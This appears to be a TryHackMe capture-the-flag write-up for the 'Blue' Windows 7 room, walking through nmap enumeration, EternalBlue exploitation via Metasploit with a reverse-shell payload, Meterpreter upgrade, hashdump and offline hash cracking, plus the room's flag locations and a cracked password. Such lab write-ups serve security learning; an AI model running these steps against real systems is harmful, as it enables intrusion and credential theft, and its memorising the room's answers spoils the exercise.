Skip to content

Blue.md

Latest commit

 

History

History
138 lines (97 loc) · 2.91 KB

Blue.md

File metadata and controls

138 lines (97 loc) · 2.91 KB

Blue

Platform: TryHackMe
OS: Windows
Difficulty: Easy
Tags: eternalblue ms17-010 metasploit windows
Date: 2026-05

Summary

Windows 7 machine vulnerable to EternalBlue (MS17-010). This is one of the most famous exploits in history — used by WannaCry ransomware in 2017. Nmap confirms the vulnerability, Metasploit delivers a SYSTEM shell, and Mimikatz recovers crackable password hashes.

Enumeration

Port Scan

nmap -sV -sC -p- --min-rate 5000 <TARGET_IP>
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1
3389/tcp  open  ms-wbt-server Microsoft Terminal Services

SMB on port 445 is the immediate point of interest on a Windows 7 machine.

Vulnerability Check

nmap --script smb-vuln-ms17-010 <TARGET_IP>
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143

Confirmed vulnerable to EternalBlue. This gives us unauthenticated remote code execution as SYSTEM.

Exploitation

EternalBlue via Metasploit

msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set payload windows/x64/shell/reverse_tcp
run

Got a shell. Confirmed we landed as SYSTEM:

C:\Windows\system32> whoami
nt authority\system

Shell Upgrade to Meterpreter

Backgrounded the shell and upgraded for better post-exploitation features:

background
use post/multi/manage/shell_to_meterpreter
set SESSION 1
run

Post Exploitation

Password Hashes

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<HASH>:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:<HASH>:::

Cracked Jon's hash offline with John:

john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
alqfna22        (Jon)

Flags

# Flag 1 — root of C:
C:\flag1.txt

# Flag 2 — where passwords are stored
C:\Windows\System32\config\flag2.txt

# Flag 3 — Jon's documents
C:\Users\Jon\Documents\flag3.txt

Key Lessons

  • Always check SMB on Windows machines — especially older versions (Win 7, Server 2008)
  • MS17-010 is still seen in real engagements on unpatched internal networks
  • shell_to_meterpreter is essential — raw shells are limited for post-exploitation
  • NTLM hashes from hashdump can often be cracked with rockyou.txt
  • EternalBlue delivers SYSTEM directly — no privilege escalation needed

References